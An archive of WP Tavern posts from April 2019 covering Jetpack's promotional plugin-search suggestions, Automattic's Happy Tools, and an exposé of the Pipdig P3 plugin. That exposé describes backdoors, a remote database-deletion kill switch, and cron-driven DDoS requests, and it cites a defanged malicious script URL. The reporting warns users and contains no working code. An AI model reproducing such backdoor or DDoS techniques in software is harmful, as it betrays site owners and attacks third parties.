Monthly Archives: April 2019

WPWeekly Episode 350 – Don’t Touch My Plugin Search Results

In this episode, John James Jacoby and I discuss a controversial feature in Jetpack 7.1 that adds feature suggestions to plugin search results. We also talk about extension suggestions that are coming to WooCommerce.

We talk about the security implications from the recent investigations into the Pipdig plugin and what users can do about it. Near the end of the show, we send a shout-out to Carole Olinger for her contributions to the WordPress community.

Stories Discussed:

Pipdig Updates P3 Plugin after Reports Expose Vendor Backdoors, Built-in Kill Switch, and Malicious DDoS Code

Jetpack 7.1 Adds Feature Suggestions to Plugin Search Results

Extension Suggestions in 3.6

On Health, WordPress and a Tough Decision

WPWeekly Meta:

Next Episode: Wednesday, April 10th 3:00 P.M. Eastern

Subscribe to WordPress Weekly via Itunes

Subscribe to WordPress Weekly via RSS

Subscribe to WordPress Weekly via Stitcher Radio

Subscribe to WordPress Weekly via Google Play

Listen To Episode #350:

Source: WP Tavern

Jetpack Is Promoting Paid Upgrades on Plugin Search Screen, WordPress Plugin Team Says it “May be a Violation” of Directory Guidelines

Yesterday the discussion surrounding Jetpack’s implementation of feature suggestions in the plugin search screen became heated after developers pointed out that Automattic is also using these suggestions to promote paid upgrades. You can test this by searching for “backups” where you find that Jetpack’s commercial offering takes the place of the first result, pushing all other results further down one slot.

The feature suggestions were added in versions 7.1 to inform users of an existing feature in Jetpack when they search for something similar. The Jetpack team said they developed it to solve a discovery problem, where users are quite often not familiar with all of Jetpack’s 45 modules and end up installing plugins to perform functionality that Jetpack already includes. A PR in the Jetpack repository has been merged to only show feature suggestions when the user’s plan supports it, so it looks like these promotions for commercial features will be removed in a future release of the plugin.

It’s not clear whether Automattic intentionally rolled out the feature suggestions in its current form (with paid upgrades included) to test the waters and gauge the community’s reaction, or if it is simply a mistake. The PR was marked as an enhancement, not a bug.

According to Plugin Team member Samuel “Otto” Wood, feature suggestions with paid upgrades included is “likely a violation” of the plugin directory’s guidelines.

“Promoting other plugins or premium upgrades in the same space would likely not be allowed, because it would be misleading or an incorrect place to put ‘advertising,’ Wood said. “Guidelines already say not to do that.”

I contacted the Plugin Team today and it seems the topic of feature suggestions on the plugin screen are still a matter of ongoing debate. The team would not officially confirm whether or not Jetpack is currently in violation.

“I can’t confirm that at this time,” Mika Epstein said. “It might be a violation, but it also may not be. Much of that comes down to intent.

“A case can be made that they’re promoting paid services for existing features, and is that different from an image-optimizer plugin promoting it’s own service which you’re already using? It’s not like they’re promoting separate plugins, so it’s in a very odd grey area for services.”

Epstein said the team is “still arguing the semantics internally about that one.”

Many people have asked why Jetpack has not been removed from the plugin directory for advertising its commercial offerings on the plugin screen. The Plugin Team’s official response is that if Jetpack is in violation, they reserve the right to make an exception and opt not to close it. Epstein, on behalf of the team, offered the following statement:

It falls under our 18th guideline:

We reserve the right to NOT close a plugin and grant exceptions.

Closing plugins is ALWAYS a tricky thing. We regularly warn, and do not close, larger plugins as closing them would have an adverse impact on the entire WordPress community. Closing plugins with 500,000 users can be more harmful than helpful, even when there are security problems. The more users a plugin gets, the more difficult it is to weigh the risks of closing versus not closing.

Maintaining the trust in larger plugins is as important as doing so with the directory as a whole. With so many outlets wanting to spin up FUD and blast outrage at everyone involved as their first reaction, we try to stem the tide a little and not act like the sky is falling all the time.

Jetpack has more than 5 million active installs. If it is found to be in violation of the guidelines, it is not likely to be removed due to the impact it would have on millions of WordPress users, not to mention the hosts who have it pre-installed on WordPress hosting plans.

The discussion regarding how WordPress can improve the implementation of feature suggestions on the plugin screen for all plugins is happening in a ticket on trac opened by Joost de Valk. This ticket does not debate whether or not feature suggestions are a good idea in general but rather focuses on how results can better communicate that a feature is already active or available. de Valk shared a screenshot of what the screen currently looks like when a user searches for a plugin for which they already have a match installed:

“The disabled ‘Active’ button there is not very useful, as it doesn’t provide any context as to why that button is disabled,” de Valk said. “I’d like to propose a change: let’s turn this into two separate groups of results, one that says ‘these plugins you already have installed might be able to help’ and then a second group below that with other plugins.”

Tim Hengeveld posted a mockup of what an implementation of that might look like:

The topic of feature suggestions on this screen is still highly controversial, despite the Plugin Team confirming that it is not breaking the guidelines (as long as plugins don’t promote paid upgrades). Plugin authors have worked for years towards better rankings on this screen by providing quality support and updates that translate into better ratings and more installs. Any mega plugin that offers multiple modules packed into one can easily usurp these rankings by suggesting its own features and having them automatically appear in that top slot. These features could even be broken down into multiple micro-modules so that there is always something to suggest.

Many in the WordPress development community are worried that plugin authors will move towards distributing their work as large suites of modules in order to take advantage of promoting their own features in the plugin search screen. This seems even more likely with block developers releasing massive collections of Gutenberg blocks.

WordPress.org is at a crossroads here that may open the floodgates to plugin authors looking to leverage this screen to their own advantage. Jetpack’s move to suggest its own features on this screen, instead of opting for an admin notice or using its own dashboard, is going to have a major ripple effect throughout the plugin ecosystem that has the potential to change how plugins are packaged, distributed, and marketed.

Source: WP Tavern

Pipdig Updates P3 Plugin after Reports Expose Vendor Backdoors, Built-in Kill Switch, and Malicious DDoS Code

Over the weekend, Pipdig, a small commercial theme company, has been at the center of a scandal after multiple reports exposed a litany of unethical code additions to its Pipdig Power Pack (P3) plugin.

On Friday, March 29, Wordfence threat analyst Mikey Veenstra published a report with code examples of the backdoors Pipdig built into their plugin, along with some unsavory and questionable additions to the code.

“We have confirmed that the plugin, Pipdig Power Pack (or P3), contains code which has been obfuscated with misleading variable names, function names, and comments in order to hide these capabilities,” Veenstra said.

These include an unauthenticated password reset to a hard-coded string, which was deliberately obscured with code comments indicating it was added to “check for new social channels to add to navbar.” Veenstra also demonstrated how the plugin contained code for an unauthenticated database deletion, wherein the Pipdig team could remotely destroy any site WordPress site using the P3 plugin.

The code for remote site deletion was removed in version 4.8.0 but it still a concern for users who haven’t updated. Michael Waterfall, iOS Engineer at ASOS, tested the “kill switch” function and demonstrated that it still works with prior versions.

Veenstra’s investigation also uncovered questionable remote calls in the plugin’s cron events, undisclosed content and configuration rewrites, and a list of popular plugins that are immediately deactivated when P3 is activated, without the user’s knowledge. He found that some of these plugins are deactivated alongside admin_init, so any user attempts to reactivate the plugins will not stick.

Wordfence estimates the P3 plugin to have an install base of 10,000-15,000 sites. The changes made in version 4.8.0 of the plugin are not transparently identified in the changelog, so it’s not easy for users to know what has changed. The content filtering and the plugin deactivations remain in the most recent release. These types of veiled functions performed without permission could have unintended consequences on sites using the plugin, which non-technical users may not be able to fix themselves.

Pipdig P3 Plugin Performed a DDoS Attack on a Competitor’s Site

Jem Turner, a freelance web developer based in the UK, published a lengthy analysis of the P3 plugin the same day that Wordfence released its analysis. She drilled down further into the remote requests, demonstrating how Pipdig has been using the P3 plugin to perform a DDoS attack on a competitor who also provides WordPress themes and installation services to bloggers. The code triggers an hourly cron job on users’ sites, effectively using their customers’ servers to send malicious requests to the competitor’s site.

The code comment tells us this is “checking the CDN (content delivery network) cache”. It’s not. This is performing a GET request on a file (id39dqm3c0_license_h.txt) sat on pipdigz.co.uk, which yesterday morning returned ‘https://kotrynabassdesign.com/wp-admin/admin-ajax.php’ in the response body.

Every single hour night and day, without any manual intervention, any blogger running the pipdig plugin will send a request with a faked User Agent to ‘https://kotrynabassdesign.com/wp-admin/admin-ajax.php’ with a random number string attached. This is effectively performing a small scale DDoS (Distributed Denial of Service) on kotrynabassdesign.com’s server.

Turner also contacted Kotryna Bass, Pipdig’s competitor, who said she had contacted her host after finding that her admin-ajax.php file was under some kind of attack. Bass’ exchanges with her host are also published in Turner’s report.

Turner’s post explained how Pipdig’s P3 plugin code manipulated links to point to their own products and services when a user includes a link to a competitor in the the content:

Here we have pipdig’s plugin searching for mentions of ‘blogerize.com‘ with the string split in two and rejoined – concatenated – to make it harder to find mentions of competitors when doing a mass ‘Find in Files’ across the plugin (amongst other things). When the plugin finds links to blogerize.com in blogger’s content (posts, pages), they’re swapped out with a link to ‘pipdig.co/shop/blogger-to-wordpress-migration/’ i.e. pipdig’s own blog migration services. Swapping these links out boost the SEO benefit to pipdig, and the vast majority of bloggers wouldn’t notice the switcheroo (especially as if the page/post was edited, the link to blogerize would appear in the backend as normal).

The plugin did not ask users’ permission before performing any of these actions and most of them were implemented with obfuscated code. Turner’s investigation also covers how the P3 plugin could harvest data and change admin passwords. Many of the findings overlap with Wordfence’s analysis.

“I was aware that Wordfence had been contacted for an opinion, although I was unaware they were writing a post and vice versa,” Turner said. “I wasn’t surprised that they wrote about it though, given the risk to WordPress users.”

She has been in contact with authorities regarding Pipdig’s unethical coding practices and privacy violations.

“From my side of things, I’ve been in contact with Action Fraud (submitted a report through their website) and NCSC (who pointed me back to Action Fraud and gave me a number to call). From pipdig’s side, there are threats of legal action in their blog post but I’ve received nothing yet.”

Pipdig’s Public Response Skirts Critical Concerns

Pipdig Creative Director Phil Clothier published a public response from the company which opens by characterizing the recent investigations as “various accusations and rumours spreading about pipdig” and includes an emotional plea regarding how distressing recent developments have been for his company. He claims that his team and their supporters are being harassed.

After pushing out the 4.8.0 version of the P3 plugin, removing some but not all of the offensive code, Clothier opts for a Q&A style format for his post, putting every question in the present tense:

Do you DDOS competitors?
No.

Do you “kill” sites?
No!

Do you have the ability to kill sites via the pipdig Power Pack?
No

Regarding the “kill switch” feature they built in, which detects all tables with the WordPress prefix and drops each of them, Clothier said it was simply a function to reset a site back to its default settings. He deliberately misrepresented what it does:

There was function in an older version of the plugin which could be used to reset a site back to the default settings. This function had no risk of of malicious or unintentional use. I can say categorically that there was no risk to your site if you were using a pipdig theme. This feature has been dug up and labelled a “Kill Switch” for maximum negative impact on us.

Clothier claims the function was available in the P3 plugin in July 2018 when a third party started posting Pipdig themes for sale on their own site:

A 3rd party was able to download all of our themes illegitimately and post them on a clone of our own site. This included previews of our themes and the ability to purchase them. We were first alerted to this by people which had purchased a pipdig theme from there, but were finding that certain features did not work correctly. After investigation, we found that the victim had purchased the theme from the 3rd party, thinking it was us. The 3rd party not only gained the financial benefit of the theme payment, but also used it as a way to inject malware and ads into the victim’s site. The reset function was put in place in order to remove the 3rd party’s ability to host preview sites with our themes. It worked, and they have since disappeared. The function was then removed in a later version of the plugin.

This is a false claim, as Wordfence pointed out in an updated article. The first instance of the code responsible for database deletion was committed to the plugin in November 2017.

The company failed to address the most critical concerns presented in the Wordfence analysis in its first pass at issuing a public statement. Instead, on the matter of coordinating a DDoS attack on competitors, Pipdig blames users and suggests they may have added the competitor’s URL to their sites.

“We’re now looking into why this function is returning this url,” Clothier said. “However, it seems to suggest that some of the ‘Author URLs’ have been set to ‘kotrynabassdesign.com’. We don’t currently know why this is the case, or whether the site owner has intentionally changed this.”

Further investigations published by Wordfence today showed that Pipdig also added DDoS code to its Blogger templates and was actively issuing malicious requests up until yesterday:

During the investigation of Pipdig’s WordPress plugin and themes, we also came across some curious code associated with their Blogger themes. This code is part of Pipdig’s suspected DDoS campaign against their competitor, and was active until April 1, four days after Pipdig’s denial of any such behavior.

Some of Pipdig’s Blogger themes have been confirmed to make external JavaScript calls to Pipdig’s server, specifically to the script hXXps://pipdigz[.]co[.]uk/js/zeplin1.js.

On March 31, as the investigations became public, Pipdig deleted its public Bitbucket repository and replaced it with a “clean one,” removing three years of commit history. Wordfence and many others cloned the repository before it was deleted and saved snapshots of pages to cite in the investigation.

Pipdig’s public statement contains a number of other false claims that are outlined in Wordfence’s followup piece with code examples. Clothier closes the article by casting aspersion on the press, presumably to encourage customers not to trust what they read from other sources.

I contacted Pipdig for their comment on recent events, but Clothier declined to answer any of my questions. One of those was why the plugin disables Bluehost’s caching plugin without informing customers.

Clothier said he didn’t have any comments beyond what he said in the public statement but encouraged anyone interested to read the new comments added to the code in version 4.9.0:

We’ve also updated version 4.9.0 of the plugin which includes extra commenting in the code, which will hopefully help clear things up like issues with Bluehost caching and the_content() filter.

If anyone is unsure, we recommend updating to the latest version as always. However we also contend that the previous versions had no serious issues too.

Pipdig declined to answer questions about licensing but the products do not appear to be GPL-licensed. This may be why the company deemed it within its rights to take action on those who they believe to have “stolen” their themes.

Pipdig Customers Share Mixed Reactions to Reports of Vendor Backdoors and DDoS Attacks

In what is perhaps one of the most brazen abuses I’ve ever seen from a theme company in WordPress’ history, Pipdig’s user base has unknowingly been used to target the company’s competitors. Regardless of the company’s motive in combatting the unauthorized distribution of their themes, these types of backdoors and undisclosed content rewrites are indefensible. They prey upon user trust and in this case the victims were primarily bloggers.

One of the more puzzling aspects of this story is that many of Pipdig’s users seem to be unfazed by the gravity of the findings in these reports. Without full knowledge of the inner workings of a product, many customers make decisions based on how they feel about a company, regardless of being confronted with facts that should cause them to question their experiences.

Others are angry to have had their sites used in an attack. Getting set up on a new theme is not a trivial task for non-technical users who may have had to pay a developer to launch their sites in the first place.

“My mind is absolutely blown by pipdig’s public response,” Jem Turner said. “I understand that they were counting on their users’ completely non-tech background to bamboozle them, and it certainly seemed to be working in the beginning, but anyone with even the slightest bit of coding knowledge can see that they are lying and I genuinely don’t understand how they think they’ll get away with it.”

This incident shines a spotlight on how unregulated the commercial plugin and theme ecosystem is and how little protection users have from companies that abuse their power. If you are a Pipdig customer affected by this incident, there is no assurance that the company will not build more backdoors into your site in the future. The plugin updates are not reviewed by any kind of authority. Fortunately, there are a few actions you can take to create a safer environment for your website.

First, look for GPL-licensed themes and plugins, because they grant you more freedoms as the user and are compatible with WordPress’ legal license. GPL-licensed products are also a strong indication that the authors respect user freedoms and the shared economic principles that this open source license supports.

Many reputable theme companies choose to host their products’ companion plugins on WordPress.org for ease of distribution and shipping updates. The official directory does not permit these kinds of shady coding practices described in this article and all of the plugins go through a security review by the WordPress Plugin Team. If you are concerned about code quality and the potential for abuse, do a little research on your next prospective commercial theme provider or opt for free WordPress.org-hosted themes and plugins that have undergone a more rigorous vetting process.

Source: WP Tavern

Jetpack 7.1 Adds Feature Suggestions to Plugin Search Results

Jetpack 7.1 was released earlier this month with new blocks for WordAds, Business Hours, Contact Info, Slideshows, and Videos. This release also quietly added suggestions to the plugin search screen, a change that has not been well-received by the developer community. If a user searches for a plugin that has a feature that is already offered by Jetpack, the plugin will insert an artificial (and dismissible) search result into the first plugin card slot, identifying the corresponding Jetpack feature.

Although these suggestions in plugin search results were not presented as a headline feature in the 7.1 release post, it was clearly listed in the changelog under enhancements. More people began taking notice after WordPress developer Mehul Gohil tweeted a screenshot of it on a live site:

Manipulating search results, even to insert an artificial result, using a plugin that is already installed, is a major new development among plugins hosted on WordPress.org. Automattic is setting a precedent for other plugin authors that want to recommend their own add-ons or extensions when users match certain search terms.

In the feature’s initial proof of concept, Jetpack product lead Beau Lebens explained the motivation behind adding suggestions to the search screen:

We’ve seen that people with Jetpack installed and activated often search for Jetpack features (even by name) in the Plugins > Add New screen in wp-admin. This new module attempts to spot those searches, and provide an artificial search result that calls out that what they’re looking for is in Jetpack, which they already have, and which is already active.

Eight years since its initial release, Jetpack has grown to 45 modules. Most users are not familiar with everything the plugin offers. In fact, many users may not have even installed Jetpack themselves, as it often comes pre-installed with hosting. The suggestions may prevent users from adding alternate third-party plugins, as Jetpack’s module placement in the results subtly implies that these are inferior options to its existing modules.

One of the reasons the feature has many developers rattled is because the UI fails to make it clear that this is an artificial result and not something generated by the plugin directory’s algorithm. Although it is intended to function more as a notice, for the regular user, it is virtually indistinguishable from an advertisement in its current implementation. It hasn’t been live for very long, but over time it may even make it more difficult for plugin developers to offer plugins that compete with Jetpack features.

The feature suggestions in plugin search results became a hot topic on Post Status‘ Slack where Automattic’s Gary Pendergast dropped in to reiterate the Jetpack team’s intentions.

“I’ve been talking to some folks on Jetpack about what’s going on,” Pendergast said. “I think the team’s end goal is pretty good, and it solves a real problem WordPress has. Too often, site owners install masses of plugins that they don’t need, which ultimately creates all sorts of security, performance, and stability issues. In this particular use case, if a site owner is looking for functionality that Jetpack already handles, then the owner should be aware of that.”

Pendergast also said he thinks WordPress core should offer an API for any plugin to be able to do something similar.

Plugin Team Says Jetpack’s Artificial Search Results Do Not Break WordPress.org Guidelines

Although it’s easy to conjure up different ways to abuse this avenue for advertising a plugin’s existing features, WordPress.org’s plugin team is ready to deal with a potential influx of various implementations on a case-by-case basis.

“It’s not really advertising anything – it’s just adding search results for pieces of a plugin that you already have and might not know about, so it’s not really against any rules,” Samuel “Otto” Wood said. “If it was misleading in some manner, then that would be different.”

Wood said the team discussed it but concluded that any implementation of something similar in other plugins will need to be reviewed to see if it’s doing anything misleading.

“Realistically it’s always going to be a judgment call of some sort,” Wood said. “For example, if a plugin was to insert search results for other plugins, then that wouldn’t be okay, because it’s misleading. But, this isn’t that case. It’s just trying to say ‘hey, you have a plugin already installed which does what you’re looking for,’ so it’s trying to be helpful in that respect. It may not necessarily be the best way of accomplishing that goal, admittedly. But it’s pretty valid.”

Wood did not place a hard requirement on having the artificial result be dismissible but said anytime a developer inserts something into a screen where would not normally be, having dismiss functionality is good UX. He doesn’t think it’s likely that many other plugin authors will implement something similar since most are not collections of dozens of plugins and add-ons. However, this type of suggestion seems like it would also be applicable to block collection plugins that include dozens of Gutenberg blocks.

“It will be really difficult for users when all the essential plugin authors implement it,” Gohil said in response to comments on the screenshot he tweeted. “They are using JS to hack into plugin search using hook ‘admin_enqueue_scripts’ and that’s not good. I’m not in favor of it.”

If more plugin authors begin adding suggestions, users could see several rows of artificial results before seeing any real ones, depending on which plugins they have installed. Plugin developers are already brainstorming ways to strip the feature suggestions out. It likely will not be long before plugins like Hide Jetpack Promotions removes the artificial search results to maintain results as delivered by WordPress.org.

Wood said the plugin team does not intend to write any new guidelines for plugin authors creating their own implementations of feature suggestions on the search screen.

“The difference is always going to be one of intent,” Wood said. “It’s JP’s intent here to notify the user of the existence of a feature they may not know about. That’s trying to be helpful to the user, not trying to shut out competition. It doesn’t remove search results. It doesn’t reorder them or filter them. It just adds a card about the feature you’re searching for. If you don’t have JP, then it can’t do anything. It’s not advertising for other plugins or anything like that.”

Jetpack is also tracking search terms longer than three characters, and Wood confirmed that this is also within the guidelines, as long as it is disclosed to the user.

“The whole tracking module doesn’t activate until after you agree to the ToS thingy, so honestly, it’s allowed,” Wood said. “They track lots of things for stats and such. Realistically, so do many other plugins. As long as you ask the user first, before tracking anything, then tracking data is allowed. Opt-in is the rule.”

Wood said he found the search term tracking to be unnecessary since WordPress.org already collects this information through its new search system that runs on ElasticSearch.

“We get all the search terms on the WordPress.org servers, anyway, so both we and they kinda already have them,” Wood said. “Automatticians built our newest plugin search engine, after all. It seems kind of a waste to track them using Jetpack when they literally receive all the searches to run through the search engine.”

Jetpack’s artificial search results, although dismissible, take up the top spot, bypassing the algorithm altogether. It gives the appearance that Jetpack’s built-in feature is either a promoted listing or superior to all other options available in the directory.

Although a suggested module may work more harmoniously with other Jetpack features than a third-party plugin, the modules are built to be fairly general in terms of features. They address the basic needs for the largest number of users but rarely provide more options than a standalone plugin dedicated to performing something similar. Users may very well be searching for a replacement for what Jetpack provides. The ability to easily turn off suggestions in search results with a toggle could go a long way for diplomacy.

Source: WP Tavern

Automattic Launches Happy Tools Product Line for Distributed Teams

Automattic has released Happy Schedule, the first in a new line of products called “Happy Tools,” created to solve problems for distributed teams. The products have grown out of internal tools that Automattic uses with its distributed team of more than 850 employees in 68 countries.

Most employee scheduling tools are designed for more traditional work environments where people report to work in person in the same timezone. Happy Schedule allows employees to set their own flexible schedules all the way down to 15-minute increments, seamlessly managing timezones for team members in one calendar. Automattic uses it to manage 24-hour global support with its 300+ Happiness Engineers.

Happy Tools is currently priced at $60/month for 12 users and then $5/user after that.

“In addition to Happy Schedule, we’ll be looking to bring our customer chat tool into Happy Tools,” Happy Tools product lead Matt Wondra said. “We’ll also look at other applications Automattic has already built to help with team communication, people-management, and customer support.”

The product suite complements Matt Mullenweg’s recent TED talk in which he evangelizes distributed work as “the future of work.” Mullenweg predicts that companies will evolve to become distributed first or will soon be replaced by ones that are.

Beyond simply recognizing the benefits of employees being able to design their own work environments, there are some real challenges to becoming a distributed company. This is especially true for those that didn’t start out that way. Smaller companies have less experience navigating all the tax laws and legal processes around hiring people from different countries. These hurdles make it difficult to grow an international team and retain employees as anything more than hourly contractors.

Answering some of these difficult questions gets into the meat of making distributed teams a reality. With its position as one of the few distributed companies that has successfully scaled into the hundreds, Automattic has an opportunity to open source some of its counsel, documents, and HR guides around international hiring. This would be a valuable addition to distributed.blog or the Happy Tools blog that would help more companies move beyond their initial explorations of distributed work and ultimately create a larger market for these kinds of tools.

Source: WP Tavern